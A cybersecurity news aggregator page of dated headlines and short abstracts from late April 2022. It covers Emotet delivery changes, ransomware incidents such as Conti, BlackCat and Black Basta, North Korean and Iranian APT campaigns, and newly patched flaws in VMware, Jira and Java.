Abstract The threat actor behind the prolific Emotet botnet is testing new attack methods on a small scale before co-opting them into their larger volume malspam campaigns, potentially in response to Microsoft's move to disable Visual Basic for Applications (VBA) macros by default across its products. Calling the new activity a "departure" from the group's typical behavior, ProofPoint alternatively raised the possibility that the latest set of phishing emails distributing the malware show that the operators are now "engaged in more selective and limited attacks in parallel to the typical massive scale email campaigns." Emotet, the handiwork of a cybercrime group tracked as TA542 (aka Mummy Spider or Gold Crestwood), staged a revival of sorts late last year after a 10-month-long hiatus following a coordinated law enforcement operation to take down its attack infrastructure. Since then, Emotet campaigns have targeted thousands of customers with tens of

The Hacker News

April 26, 2022 – APT

Iran-linked APT Rocket Kitten exploited VMware bug in recent attacks Full Text

Abstract The Iran-linked APT group Rocket Kitten has been observed exploiting a recently patched CVE-2022-22954 VMware flaw. Iran-linked Rocket Kitten APT group has been observed exploiting a recently patched CVE-2022-22954 VMware Workspace ONE Access flaw...

Security Affairs

April 26, 2022 – Malware

Emotet malware now installs via PowerShell in Windows shortcut files Full Text

Abstract The Emotet botnet is now using Windows shortcut files (.LNK) containing PowerShell commands to infect victims' computers, moving away from Microsoft Office macros that are now disabled by default.

BleepingComputer

April 26, 2022 – Malware

Prynt Stealer: A Newly Discovered Threat Full Text

Abstract Cybersecurity analysts have detected yet another info-stealer malware infection, named Prynt Stealer, offering powerful capabilities and extra keylogger and clipper modules. The developer of the stealer claims the recent version of the stealer is undetectable. Users are suggested to use a stro ...

Cyware Alerts - Hacker News

April 26, 2022 – Hacker

Gold Ulrick Hackers Still in Action Despite Massive Conti Ransomware Leak Full Text

Abstract The infamous ransomware group known as Conti has continued its onslaught against entities despite suffering a massive data leak of its own earlier this year, according to new research. Conti, attributed to a Russia-based threat actor known as Gold Ulrick, is one of the most prevalent malware strains in the ransomware landscape, accounting for 19% of all attacks during the three-month period between October and December 2021. One of the most prolific ransomware groups of the last year along the likes of LockBit 2.0, PYSA, and Hive, Conti has locked the networks of hospitals, businesses, and government agencies, while receiving a ransom payment in exchange for sharing the decryption key as part of its name-and-shame scheme. But after the cybercriminal cartel came out in support of Russia over its invasion of Ukraine in February, an anonymous Ukrainian security researcher under the Twitter handle ContiLeaks began leaking the source code as well as private conversations between

The Hacker News

April 26, 2022 – Government

CISA adds new Microsoft, Linux, and Jenkins flaws to its Known Exploited Vulnerabilities Catalog Full Text

Abstract The US Cybersecurity and Infrastructure Security Agency (CISA) adds seven new flaws to its Known Exploited Vulnerabilities Catalog, including Microsoft, Linux, and Jenkins bugs. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added seven vulnerabilities...

Security Affairs

April 26, 2022 – Attack

American Dental Association hit by new Black Basta ransomware Full Text

Abstract The American Dental Association (ADA) was hit by a weekend cyberattack, causing them to shut down portions of their network while investigating the attack.

BleepingComputer

April 26, 2022 – Ransomware

Researchers Share New Insights on Nokoyawa Ransomware Full Text

Abstract Researchers from SentinelLabs claimed that Nokoyawa is clearly a variant of Nemty (Karma) ransomware. Previously, Trend Micro had highlighted similarities in the attack chain between Nokoyawa and Hive ransomware.

Cyware Alerts - Hacker News

April 26, 2022 – Attack

North Korean Hackers Target Journalists with GOLDBACKDOOR Malware Full Text

Abstract A state-backed threat actor with ties to the Democratic People's Republic of Korea (DPRK) has been attributed to a spear-phishing campaign targeting journalists covering the country with the ultimate goal of deploying a backdoor on infected Windows systems. The intrusions, said to be the work of Ricochet Chollima, resulted in the deployment of a novel malware strain called GOLDBACKDOOR, an artifact that shares technical overlaps with another malware named BLUELIGHT, which has been previously linked to the group. "Journalists are high-value targets for hostile governments," cybersecurity firm Stairwell said in a report published last week. "Compromising a journalist can provide access to highly-sensitive information and enable additional attacks against their sources." Ricochet Chollima, also known as APT37, InkySquid, and ScarCruft, is a North Korean-nexus targeted intrusion adversary that has been involved in espionage attacks since at least 2016. The

The Hacker News

April 26, 2022 – Criminals

Stormous ransomware gang claims to have hacked Coca-Cola Full Text

Abstract The Stormous ransomware gang claims to have hacked the multinational beverage corporation Coca-Cola Company. The Stormous ransomware gang announced with a post on its leak site to have hacked the multinational beverage corporation Coca-Cola...

Security Affairs

April 26, 2022 – Breach

Coca-Cola investigates hackers’ claims of breach and data theft Full Text

Abstract Coca-Cola, the world's largest soft drinks maker, has confirmed in a statement to BleepingComputer that it is aware of the reports about a cyberattack on its network and is currently investigating the claims.

BleepingComputer

April 26, 2022 – Ransomware

BlackByte Ransomware - Wilder And Scarier Than Ever Full Text

Abstract Researchers released a report on BlackByte ransomware describing new variants written in Go and DotNET, with one variant written with a mix of Go and C languages. The ransomware actors were observed making changes to the registry in an attempt to escalate privileges. Organizations are suggested to ...

Cyware Alerts - Hacker News

April 26, 2022 – APT

North Korea-linked APT37 targets journalists with GOLDBACKDOOR Full Text

Abstract North Korea-linked APT37 group is targeting journalists that focus on DPRK with a new piece of malware. North Korea-linked APT37 group (aka Ricochet Chollima) has been spotted targeting journalists focusing on DPRK with a new piece of malware. The...

Security Affairs

April 26, 2022 – Privacy

Google Play Store now forces apps to disclose what data is collected Full Text

Abstract Google is rolling out a new Data Safety section on the Play Store, Android's official app repository, where developers must declare what data their software collects from users of their apps.

BleepingComputer

April 26, 2022 – Ransomware

Inside a ransomware incident: How a single mistake left a door open for attackers Full Text

Abstract The BlackCat ransomware attack against the undisclosed organization took place in March 2022 and has been detailed by cybersecurity researchers at Forescout who investigated the incident.

ZDNet

April 26, 2022 – Privacy

Anomaly Six, a US surveillance firm that tracks roughly 3 billion devices in real-time Full Text

Abstract An interesting article published by The Intercept reveals the secretive business of a US surveillance firm named Anomaly Six. When we speak about the secretive business of surveillance businesses we often refer to the powerful tools developed by Israeli...

Security Affairs

April 26, 2022 – Vulnerabilities

Public interest in Log4Shell fades but attack surface remains Full Text

Abstract It's been four months since Log4Shell, a critical zero-day vulnerability in the ubiquitous Apache Log4j library, was discovered, and threat analysts warn that the application of the available fixes is still way behind.

BleepingComputer

April 26, 2022 – Vulnerabilities

IBM database updates address critical vulnerabilities in third-party XML parser Full Text

Abstract IBM has updated its data management platform Db2 in order to protect users from a pair of critical vulnerabilities in older versions of Expat, a third-party library. Both flaws notched a CVSS score of 9.8.

The Daily Swig

April 26, 2022 – General

David Colombo on Tesla Hacks and Growing into Hacking Full Text

Abstract Cybellum interviewed David Colombo, the cyber boy wonder of Germany, and founder of Colombo Technologies for our podcast, Left to Our Own Devices. Not yet 20 years old, the prolific cyber researcher already has to his credit the exposure of numerous critical vulnerabilities, including the honor of hacking his way into Tesla vehicles.

BleepingComputer

April 26, 2022 – Criminals

Emotet Operators Use New Delivery Techniques Like OneDrive URLs and XLL Files Full Text

Abstract The activity occurred while Emotet was on a “spring break,” not conducting its typical high volume threat campaigns. The threat actor has since resumed its typical activity.

Proof Point

April 26, 2022 – Vulnerabilities

Hackers exploit critical VMware RCE flaw to install backdoors Full Text

Abstract Advanced hackers are actively exploiting a critical remote code execution (RCE) vulnerability, CVE-2022-22954, that affects VMware Workspace ONE Access (formerly called VMware Identity Manager).

BleepingComputer

April 26, 2022 – Breach

France: Health data leak leads to $1.6 million fine against Dedalus Biologie Full Text

Abstract Following a massive health data leak disclosed in the press concerning nearly 500,000 persons in February 2021, the CNIL has fined the company Dedalus Biologie ~$1.6 million mainly for failure to comply with its data security obligation.

Lexology

April 26, 2022 – Breach

Stormous Ransomware Group Claims to Steal 161GB of Data from Coca Cola Full Text

Abstract Coca-Cola said it is investigating reports of a data breach after a ransomware group named Stormous claimed to have stolen internal documents from the American beverage giant.

The Record

April 25, 2022 – Attack

Iranian Hackers Exploiting VMware RCE Bug to Deploy ‘Core Impact’ Backdoor Full Text

Abstract An Iranian-linked threat actor known as Rocket Kitten has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems. Tracked as CVE-2022-22954 (CVSS score: 9.8), the critical issue concerns a case of remote code execution (RCE) vulnerability affecting VMware Workspace ONE Access and Identity Manager. While the issue was patched by the virtualization services provider on April 6, 2022, the company cautioned users of confirmed exploitation of the flaw occurring in the wild a week later. "A malicious actor exploiting this RCE vulnerability potentially gains an unlimited attack surface," researchers from Morphisec Labs said in a new report. "This means highest privileged access into any components of the virtualized host and guest environment." Attack chains exploiting the flaw involve the distribution of a PowerShell-based stager, which is the

The Hacker News

April 25, 2022 – Government

CISA adds 7 vulnerabilities to list of bugs exploited in attacks Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added seven vulnerabilities to its list of actively exploited security issues, including those from Microsoft, Linux, and Jenkins.

BleepingComputer

April 25, 2022 – General

Zero-Day Exploits Touch Record High Full Text

Abstract Attackers are quick to zero in on zero-days these days. Google’s Project Zero tracked 58 zero-day exploits last year, implying that this is the highest number of zero-days detected.

Cyware Alerts - Hacker News

April 25, 2022 – Vulnerabilities

Researchers Report Critical RCE Vulnerability in Google’s VirusTotal Platform Full Text

Abstract Security researchers have disclosed a security vulnerability in the VirusTotal platform that could have been potentially weaponized to achieve remote code execution (RCE). The flaw, now patched, made it possible to "execute commands remotely within VirusTotal platform and gain access to its various scans capabilities," Cysource researchers Shai Alfasi and Marlon Fabiano da Silva said in a report exclusively shared with The Hacker News. VirusTotal, part of Google's Chronicle security subsidiary, is a malware-scanning service that analyzes suspicious files and URLs and checks for viruses using more than 70 third-party antivirus products. The attack method involved the upload of a DjVu file through the platform's web user interface, using it to trigger an exploit for a high-severity remote code execution flaw in ExifTool, an open-source utility used to read and edit EXIF metadata information in image and PDF files. Tracked as CVE-2021-22204 (CVSS score: 7.

The Hacker News

April 25, 2022 – Government

Iran announced to have foiled massive cyberattacks on public services Full Text

Abstract State television announced that Iran has foiled massive cyberattacks that targeted public services operated by both government and private organizations. According to the Iran state television, the attack attempts took place in recent days and aimed...

Security Affairs

April 25, 2022 – Malware

Emotet malware infects users again after fixing broken installer Full Text

Abstract The Emotet malware phishing campaign is up and running again after the threat actors fixed a bug preventing people from becoming infected when they opened malicious email attachments.

BleepingComputer

April 25, 2022 – Phishing

This sneaky phishing attack tries to steal your Facebook password Full Text

Abstract As part of the fake appeals process, the user is asked to provide sensitive information, including their name and email address. Before submitting the form, the user is also asked to enter their Facebook password.

ZDNet

April 25, 2022 – Cryptocurrency

Critical Bug in Everscale Wallet Could’ve Let Attackers Steal Cryptocurrencies Full Text

Abstract A security vulnerability has been disclosed in the web version of the Ever Surf wallet that, if successfully weaponized, could allow an attacker to gain full control over a victim's wallet. "By exploiting the vulnerability, it's possible to decrypt the private keys and seed phrases that are stored in the browser's local storage," Israeli cybersecurity company Check Point said in a report shared with The Hacker News. "In other words, attackers could gain full control over the victim's wallets." Ever Surf is a cryptocurrency wallet for the Everscale (formerly FreeTON) blockchain that also doubles up as a cross-platform messenger and allows users to access decentralized apps as well as send and receive non-fungible tokens (NFTs). It's said to have an estimated 669,700 accounts across the world. By means of different attack vectors like malicious browser extensions or phishing links, the flaw makes it possible to obtain a wallet's encr

The Hacker News

April 25, 2022 – Criminals

BlackCat Ransomware gang breached over 60 orgs worldwide Full Text

Abstract At least 60 entities worldwide have been breached by BlackCat ransomware, warns a flash report published by the U.S. FBI. The U.S. Federal Bureau of Investigation (FBI) published a flash report that states that at least 60 entities worldwide have...

Security Affairs

April 25, 2022 – Hacker

North Korean hackers targeting journalists with novel malware Full Text

Abstract North Korean state-sponsored hackers known as APT37 have been discovered targeting journalists specializing in the DPRK with a novel malware strain.

BleepingComputer

April 25, 2022 – Malware

The ink-stained trail of GOLDBACKDOOR Full Text

Abstract Stairwell assesses with medium-high confidence that GOLDBACKDOOR is the successor of, or used in parallel with, the malware BLUELIGHT, attributed to APT37 / Ricochet Chollima.

Stairwell

April 25, 2022 – Malware

New BotenaGo Malware Variant Targeting Lilin Security Camera DVR Devices Full Text

Abstract A new variant of an IoT botnet called BotenaGo has emerged in the wild, specifically singling out Lilin security camera DVR devices to infect them with Mirai malware. Dubbed "Lilin Scanner" by Nozomi Networks, the latest version is designed to exploit a two-year-old critical command injection vulnerability in the DVR firmware that was patched by the Taiwanese company in February 2020. BotenaGo, first documented in November 2021 by AT&T Alien Labs, is written in Golang and features over 30 exploits for known vulnerabilities in web servers, routers and other kinds of IoT devices. The botnet's source code has since been uploaded to GitHub, making it ripe for abuse by other criminal actors. "With only 2,891 lines of code, BotenaGo has the potential to be the starting point for many new variants and new malware families using its source code," the researchers said this year. The new BotenaGo malware is the latest to exploit vulnerabilities in Lil

The Hacker News

April 25, 2022 – General

Experts warn of a surge in zero-day flaws observed and exploited in 2021 Full Text

Abstract The number of zero-day vulnerabilities exploited in cyberattacks in the wild has exploded in recent years, security firms report. Google and Mandiant have published two reports that highlight a surge in the discovery of zero-day flaws exploited by threat...

Security Affairs

April 25, 2022 – Outage

French hospital group disconnects Internet after hackers steal data Full Text

Abstract The GHT Coeur Grand Est. Hospitals and Health Care group comprising nine establishments with 3,370 beds across Northeast France has disclosed a cyberattack that resulted in the theft of sensitive administrative and patient data.

BleepingComputer

April 25, 2022 – Malware

Defeating BazarLoader Anti-Analysis Techniques Full Text

Abstract It employs two distinctive anti-analysis techniques. The first is API function hashing, a known trick to obfuscate which functions are called. The second is an opaque predicate, a technique used for control flow obfuscation.

Palo Alto Networks

April 25, 2022 – Malware

New powerful Prynt Stealer malware sells for just $100 per month Full Text

Abstract Threat analysts have spotted yet another addition to the growing space of info-stealer malware infections, named Prynt Stealer, which offers powerful capabilities and extra keylogger and clipper modules.

BleepingComputer

April 25, 2022 – General

Medical device cybersecurity: What to expect in 2022? Full Text

Abstract Medical device cybersecurity has become an extremely complex challenge. It is now more important than ever to learn from industry peers and try to find the best way forward.

Help Net Security

April 25, 2022 – Ransomware

Quantum ransomware seen deployed in rapid network attacks Full Text

Abstract The Quantum ransomware, a strain first discovered in August 2021, was seen carrying out speedy attacks that escalate quickly, leaving defenders little time to react.

BleepingComputer

April 25, 2022 – General

41% of businesses had an API security incident last year Full Text

Abstract In the wake of the digital transformation wave, web APIs have experienced exponential growth as the rise of integrated web and mobile-based offerings requires significantly more data sharing across products.

Help Net Security

April 24, 2022 – Government

FBI Warns of BlackCat Ransomware That Breached Over 60 Organisations Worldwide Full Text

Abstract The U.S. Federal Bureau of Investigation (FBI) is sounding the alarm on the BlackCat ransomware-as-a-service (RaaS), which it said victimized at least 60 entities worldwide as of March 2022 since its emergence last November. Also called ALPHV and Noberus, the ransomware is notable for being the first-ever malware written in the Rust programming language that's known to be memory safe and offer improved performance. "Many of the developers and money launderers for BlackCat/ALPHV are linked to DarkSide/BlackMatter, indicating they have extensive networks and experience with ransomware operations," the FBI said in an advisory published last week. The disclosure comes weeks after twin reports from Cisco Talos and Kaspersky uncovered links between BlackCat and BlackMatter ransomware families, including the use of a modified version of a data exfiltration tool dubbed Fendr that's been previously only observed in BlackMatter-related activity. "

The Hacker News

April 24, 2022 – Vulnerabilities

Atlassian addresses a critical Jira authentication bypass flaw Full Text

Abstract Atlassian fixed a critical flaw in its Jira software, tracked as CVE-2022-0540, that could be exploited to bypass authentication. Atlassian has addressed a critical vulnerability in its Jira Seraph software, tracked as CVE-2022-0540 (CVSS score 9.9),...

Security Affairs

April 24, 2022 – Breach

Since declaring cyber war on Russia Anonymous leaked 5.8 TB of Russian data Full Text

Abstract OpRussia continues unabated, since declaring 'cyber war' on Russia Anonymous has now published approximately 5.8 TB of Russian data. The #OpRussia launched by Anonymous on Russia after the criminal invasion of Ukraine continues to collect successes,...

Security Affairs

April 24, 2022 – General

Apr 17 – Apr 23 Ukraine – Russia the silent cyber conflict Full Text

Abstract This post provides a timeline of the events related to the Russian invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing invasion that occurred in the previous weeks: April 23 - Phishing...

Security Affairs

April 24, 2022 – General

Security Affairs newsletter Round 362 by Pierluigi Paganini Full Text

Abstract A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you also want to receive the free newsletter with the international press, subscribe here....

Security Affairs

April 23, 2022 – Attack

Conti ransomware claims responsibility for the attack on Costa Rica Full Text

Abstract Costa Rican businesses fear that the ransomware gang could have infiltrated confidential information they provided to the government. The leak of this data could pose a serious risk to these organizations.

Security Affairs

April 23, 2022 – Breach

T-Mobile confirms Lapsus$ had access to its systems Full Text

Abstract Telecommunication giant T-Mobile confirmed the LAPSUS$ extortion group gained access to its networks in March. Telecom company T-Mobile on Friday revealed that the LAPSUS$ extortion gang gained access to its networks. The popular investigator...

Security Affairs

April 23, 2022 – Breach

Hackers Claim to Target Russian Institutions in Barrage of Cyberattacks and Leaks Full Text

Abstract Hackers claim to have broken into dozens of Russian institutions over the past two months, including the Kremlin’s internet censor and one of its primary intelligence services, leaking emails and internal documents to the public.

New York Times

April 23, 2022 – Vulnerabilities

Are you using Java 15/16/17 or 18 in production? Patch them now! Full Text

Abstract A researcher has released proof-of-concept (PoC) code for a digital signature bypass vulnerability in Java. Security researcher Khaled Nassar released a proof-of-concept (PoC) code for a new digital signature bypass vulnerability, tracked as CVE-2022-21449 (CVSS...

Security Affairs

April 23, 2022 – Phishing

Phishing attacks using the topic “Azovstal” targets entities in Ukraine Full Text

Abstract Ukraine CERT-UA warns of phishing attacks on state organizations of Ukraine using the topic "Azovstal" and Cobalt Strike Beacon. The Computer Emergency Response Team of Ukraine (CERT-UA) warns of phishing attacks aimed at organizations in the country...

Security Affairs

April 22, 2022

T-Mobile Admits Lapsus$ Hackers Gained Access to its Internal Tools and Source Code Full Text

Abstract Telecom company T-Mobile on Friday confirmed that it was the victim of a security breach in March after the LAPSUS$ mercenary gang managed to gain access to its networks. The acknowledgment came after investigative journalist Brian Krebs shared internal chats belonging to the core members of the group indicating that LAPSUS$ breached the company several times in March prior to the arrest of its seven members. T-Mobile, in a statement, said that the incident occurred "several weeks ago," with the "bad actor" using stolen credentials to access internal systems. "The systems accessed contained no customer or government information or other similarly sensitive information, and we have no evidence that the intruder was able to obtain anything of value," it added. The VPN credentials for initial access are said to have been obtained from illicit websites like Russian Market with the goal of gaining control of T-Mobile employee accounts, ultimately allowing

The Hacker News

April 22, 2022 – Vulnerabilities

Atlassian Drops Patches for Critical Jira Authentication Bypass Vulnerability Full Text

Abstract Atlassian has published a security advisory warning of a critical vulnerability in its Jira software that could be abused by a remote, unauthenticated attacker to circumvent authentication protections. Tracked as CVE-2022-0540, the flaw is rated 9.9 out of 10 on the CVSS scoring system and resides in Jira's authentication framework, Jira Seraph. Khoadha of Viettel Cyber Security has been credited with discovering and reporting the security weakness. "A remote, unauthenticated attacker could exploit this by sending a specially crafted HTTP request to bypass authentication and authorization requirements in WebWork actions using an affected configuration," Atlassian noted. The flaw affects the following Jira products - Jira Core Server, Jira Software Server and Jira Software Data Center: All versions before 8.13.18, 8.14.x, 8.15.x, 8.16.x, 8.17.x, 8.18.x, 8.19.x, 8.20.x before 8.20.6, and 8.21.x Jira Service Management Server and Jira Service Management Data Cent

The Hacker News

April 22, 2022 – Vulnerabilities

‘Hack DHS’ bug hunters find 122 security flaws in DHS systems Full Text

Abstract The Department of Homeland Security (DHS) today revealed that bug bounty hunters enrolled in its 'Hack DHS' bug bounty program have found 122 security vulnerabilities in external DHS systems, 27 of them rated critical severity.

BleepingComputer

April 22, 2022 – General

Financial Sector Faces Ransomware Attacks, Now More Than Ever Full Text

Abstract A new VMware report states that threat actors have moved from hacking wire transfers to targeting market data. Around 75% faced at least one ransomware attack, among which 63% paid the ransom.

Cyware Alerts - Hacker News

April 22, 2022 – Vulnerabilities

Researcher Releases PoC for Recent Java Cryptographic Vulnerability Full Text

Abstract A proof-of-concept (PoC) code demonstrating a newly disclosed digital signature bypass vulnerability in Java has been shared online. The high-severity flaw in question, CVE-2022-21449 (CVSS score: 7.5), impacts the following versions of Java SE and Oracle GraalVM Enterprise Edition - Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18 Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1, 22.0.0.2 The issue resides in Java's implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA), a cryptographic mechanism to digitally sign messages and data for verifying the authenticity and the integrity of the contents. In a nutshell, the cryptographic blunder — dubbed Psychic Signatures in Java — makes it possible to present a totally blank signature, which would still be perceived as valid by the vulnerable implementation. Successful exploitation of the flaw could permit an attacker to forge signatures and bypass authentication measures put in place. The PoC, p

The Hacker News

April 22, 2022 – Attack

Conti ransomware claims responsibility for the attack on Costa Rica Full Text

Abstract Conti ransomware gang claimed responsibility for a ransomware attack that hit the government infrastructure of Costa Rica. Last week a ransomware attack has crippled the government infrastructure of Costa Rica causing chaos. The Conti ransomware...

Security Affairs

April 22, 2022 – Hacker

Russian hackers are seeking alternative money-laundering options Full Text

Abstract The Russian cybercrime community, one of the most active and prolific in the world, is turning to alternative money-laundering methods due to sanctions on Russia and law enforcement actions against dark web markets.

BleepingComputer

April 22, 2022 – Malware

Emotet Revamp: New Payloads and 64-Bit Modules Full Text

Abstract According to Kaspersky, Emotet infection has seen a ten-fold increase from February to March, going from 3,000 to 30,000 emails. It is switching to new payloads detected by fewer antivirus engines.

Cyware Alerts - Hacker News

April 22, 2022 – Cryptocurrency

Watch Out! Cryptocurrency Miners Targeting Dockers, AWS and Alibaba Cloud Full Text

Abstract LemonDuck, a cross-platform cryptocurrency mining botnet, is targeting Docker to mine cryptocurrency on Linux systems as part of an active malware campaign. "It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses," CrowdStrike said in a new report. "It evades detection by targeting Alibaba Cloud's monitoring service and disabling it." Known to strike both Windows and Linux environments, LemonDuck is primarily engineered for abusing the system resources to mine Monero. But it's also capable of credential theft, lateral movement, and facilitating the deployment of additional payloads for follow-on activities. "It uses a wide range of spreading mechanisms — phishing emails, exploits, USB devices, brute force, among others — and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns," Microsoft detailed in a technical write-up of the ma

The Hacker News

April 22, 2022 – General

Cyber Insurance and the Changing Global Risk Environment Full Text

Abstract When security fails, cyber insurance can become crucial for ensuring continuity. Cyber has changed everything around us - even the way we tackle geopolitical crises and conflicts. When Einstein was asked what a war will look like in the future, he couldn't...

Security Affairs

April 22, 2022 – Government

US govt grants academics $12M to develop cyberattack defense tools Full Text

Abstract The US Department of Energy (DOE) has announced that it will provide $12 million in funding to six university teams to develop defense and mitigation tools to protect US energy delivery systems from cyberattacks.

BleepingComputer

April 22, 2022 – Government

NIST revamps aging enterprise patch management guidance Full Text

Abstract Whereas the previous, 2013 iteration focused on helping organizations to deploy patch management technologies, the new edition centers on developing strategies for patch management.

The Daily Swig

April 22, 2022 – Vulnerabilities

QNAP Advises Users to Update NAS Firmware to Patch Apache HTTP Vulnerabilities Full Text

Abstract Network-attached storage (NAS) appliance maker QNAP on Thursday said it's investigating its lineup for potential impact arising from two security vulnerabilities that were addressed in the Apache HTTP server last month. The critical flaws, tracked as CVE-2022-22721 and CVE-2022-23943, are rated 9.8 for severity on the CVSS scoring system and impact Apache HTTP Server versions 2.4.52 and earlier - CVE-2022-22721 - Possible buffer overflow with very large or unlimited LimitXMLRequestBody CVE-2022-23943 - Out-of-bounds Write vulnerability in mod_sed of Apache HTTP Server Both the vulnerabilities, alongside CVE-2022-22719 and CVE-2022-22720, were remediated by the project maintainers as part of version 2.4.53, which was shipped on March 14, 2022. "While CVE-2022-22719 and CVE-2022-22720 do not affect QNAP products, CVE-2022-22721 affects 32-bit QNAP NAS models, and CVE-2022-23943 affects users who have enabled mod_sed in Apache HTTP Server on their QNAP device,"

The Hacker News

April 22, 2022 – Vulnerabilities

A stored XSS flaw in RainLoop allows stealing users’ emails Full Text

Abstract Experts disclose an unpatched vulnerability in the RainLoop webmail client, tracked as CVE-2022-29360, that can be exploited to steal users' emails. RainLoop is an open-source web-based email client used by thousands of organizations, which is affected...

Security Affairs

April 22, 2022 – Breach

T-Mobile confirms Lapsus$ hackers breached internal systems Full Text

Abstract T-Mobile has confirmed that the Lapsus$ extortion gang breached its network "several weeks ago" using stolen credentials and gained access to internal systems.

BleepingComputer

April 22, 2022 – Vulnerabilities

Several Critical Vulnerabilities Affect SmartPPT, SmartICS Industrial Products Full Text

Abstract A security researcher has discovered several vulnerabilities, including ones rated critical- and high-severity, in industrial products made by Elcomplus, a Russian company specializing in professional radio communications and industrial automation.

Security Week

April 22, 2022 – Vulnerabilities

QNAP firmware updates fix Apache HTTP vulnerabilities in its NAS Full Text

Abstract Taiwanese vendor QNAP warns users to update their NAS Firmware to fix Apache HTTP flaws addressed in the Apache HTTP server last month. Taiwanese vendor QNAP warns users to update their NAS Firmware to address Apache HTTP vulnerabilities, tracked...

Security Affairs

April 22, 2022 – Hacker

Chinese hackers behind most zero-day exploits during 2021 Full Text

Abstract Threat analysts report that zero-day vulnerability exploitation is on the rise with Chinese hackers using most of them in attacks last year.

BleepingComputer

April 22, 2022 – Botnet

Android Bianlian Botnet Tries to Bypass Photo TAN Authentication Used for Mobile Banking Full Text

Abstract The Android malware typically poses as a video player, Google Play app, or a mobile banking application. Once installed, it asks the victim to activate Accessibility Services for the app to “work correctly.”

Fortinet

April 22, 2022 – General

Pwn2Own Miami hacking contest awarded $400,000 for 26 unique ICS exploits Full Text

Abstract White hat hackers that participated in the Pwn2Own Miami 2022 hacking contest earned a total of $400,000 for their ICS exploits. The Pwn2Own Miami 2022 is a hacking contest organized by Trend Micro's Zero Day Initiative (ZDI) that focuses on demonstrating...

Security Affairs

April 22, 2022 – Vulnerabilities

Atlassian fixes critical Jira authentication bypass vulnerability Full Text

Abstract Atlassian has published a security advisory to alert that its Jira and Jira Service Management products are affected by a critical authentication bypass vulnerability in Seraph, the company's web application security framework.

BleepingComputer

April 22, 2022 – General

The Great Resignation meets the Great Exfiltration: How to securely offboard security personnel Full Text

Abstract Considering the Great Exfiltration, it is vital for organizations to create and implement a robust data loss prevention (DLP) strategy during the offboarding process to prevent any destruction or loss of data.

Help Net Security

April 22, 2022 – Botnet

Lemon_Duck cryptomining botnet targets Docker servers Full Text

Abstract The Lemon_Duck cryptomining botnet is targeting Docker servers to mine cryptocurrency on Linux systems. CrowdStrike's researchers reported that the Lemon_Duck cryptomining botnet is targeting Docker to mine cryptocurrency on Linux systems....

Security Affairs

April 22, 2022 – Vulnerabilities

Windows 10 KB5012636 cumulative update fixes freezing issues Full Text

Abstract Microsoft has released the optional KB5012636 cumulative update preview for Windows 10 1809 and Windows Server 2019, with fixes for system freezing issues affecting client and server systems.

BleepingComputer

April 22, 2022 – Hacker

TeamTNT Targets Linux Instances on AWS, Alibaba Cloud for Credential Theft and Cryptomining Full Text

Abstract TeamTNT is actively modifying its scripts after they were made public by security researchers. These scripts primarily target Amazon Web Services, but can also run in on-premise, container, or other forms of Linux instances.

Cisco Talos

April 21, 2022 – Vulnerabilities

Cisco Releases Security Patches for TelePresence, RoomOS and Umbrella VA Full Text

Abstract Networking equipment maker Cisco has released security updates to address three high-severity vulnerabilities in its products that could be exploited to cause a denial-of-service (DoS) condition and take control of affected systems. The first of the three flaws, CVE-2022-20783 (CVSS score: 7.5), affects Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software, and stems from a lack of proper input validation, allowing an unauthenticated, remote attacker to send specially crafted traffic to the devices. "A successful exploit could allow the attacker to cause the affected device to either reboot normally or reboot into maintenance mode, which could result in a DoS condition on the device," the company noted in an advisory. Credited with discovering and reporting the flaw is the U.S. National Security Agency (NSA). The issue has been addressed in Cisco TelePresence CE Software versions 9.15.10.8 and 10.11.2.2. CVE-2022-20773 (CVSS score: 7.5),

The Hacker News

April 21, 2022 – Attack

Docker servers hacked in ongoing cryptomining malware campaign Full Text

Abstract Docker APIs on Linux servers are being targeted by a large-scale Monero crypto-mining campaign from the operators of the Lemon_Duck botnet.

BleepingComputer

April 21, 2022 – Vulnerabilities

Cisco Patches Virtual Conference Software Vulnerability Reported by NSA Full Text

Abstract Tracked as CVE-2022-20783 (CVSS score of 7.5), the NSA-reported flaw is a denial of service (DoS) issue in TelePresence Collaboration Endpoint (CE) and RoomOS software, which could be exploited remotely, without authentication.

Security Week

April 21, 2022 – Malware

Hackers Sneak ‘More_Eggs’ Malware Into Resumes Sent to Corporate Hiring Managers Full Text

Abstract A new set of phishing attacks delivering the more_eggs malware has been observed striking corporate hiring managers with bogus resumes as an infection vector, a year after potential candidates looking for work on LinkedIn were lured with weaponized job offers. "This year the more_eggs operation has flipped the social engineering script, targeting hiring managers with fake resumes instead of targeting jobseekers with fake job offers," eSentire's research and reporting lead, Keegan Keplinger, said in a statement. The Canadian cybersecurity company said it identified and disrupted four separate security incidents, three of which occurred at the end of March. Targeted entities include a U.S.-based aerospace company, an accounting business located in the U.K., a law firm, and a staffing agency, both based out of Canada. The malware, suspected to be the handiwork of a threat actor called Golden Chickens (aka Venom Spider), is a stealthy, modular backdoor suite capable

The Hacker News

April 21, 2022 – Vulnerabilities

Critical bug in decoder used by popular chipsets exposes 2/3 of Android devices to hack Full Text

Abstract A critical RCE flaw in Android devices running on Qualcomm and MediaTek chipsets could allow access to users' media files. Security researchers at Check Point Research have discovered a critical remote code execution flaw that affects the implementation...

Security Affairs

April 21, 2022 – Hacker

Hackers earn $400K for zero-day ICS exploits demoed at Pwn2Own Full Text

Abstract Pwn2Own Miami 2022 has ended with competitors earning $400,000 for 26 zero-day exploits (and several bug collisions) targeting ICS and SCADA products demoed during the contest between April 19 and April 21.

BleepingComputer

April 21, 2022 – Vulnerabilities

Access Bypass, Data Overwrite Vulnerabilities Patched in Drupal Full Text

Abstract The first of the bugs fixed with the latest iterations of the open-source CMS is an access bypass issue that exists because of an improperly implemented generic entity access API for entity revisions.

Security Week

April 21, 2022 – Vulnerabilities

Amazon’s Hotpatch for Log4j Flaw Found Vulnerable to Privilege Escalation Bug Full Text

